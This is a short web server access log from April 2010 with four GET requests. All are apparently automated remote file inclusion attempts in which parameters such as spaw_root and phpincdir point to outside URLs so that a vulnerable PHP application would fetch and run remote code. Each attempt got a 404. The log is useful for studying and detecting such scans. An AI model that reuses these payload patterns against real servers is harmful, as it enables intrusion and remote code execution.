111.67.8.141 - - [07/Apr/2010:12:44:49 -0500] "GET /logs/access_log.1217635200//admin/spaw/spaw_control.class.php?spaw_root=http://124.139.66.60/~home06dfl/baner.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:12:52:12 -0500] "GET /logs/access_log.1260662400//default_theme.php?phpincdir=http://www.kcs.sc.kr/data/file/cb_c201004/84trnfg8tflnrh93-034p38jk?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:12:52:12 -0500] "GET /logs//default_theme.php?phpincdir=http://www.kcs.sc.kr/data/file/cb_c201004/84trnfg8tflnrh93-034p38jk?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:12:52:12 -0500] "GET //default_theme.php?phpincdir=http://www.kcs.sc.kr/data/file/cb_c201004/84trnfg8tflnrh93-034p38jk?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
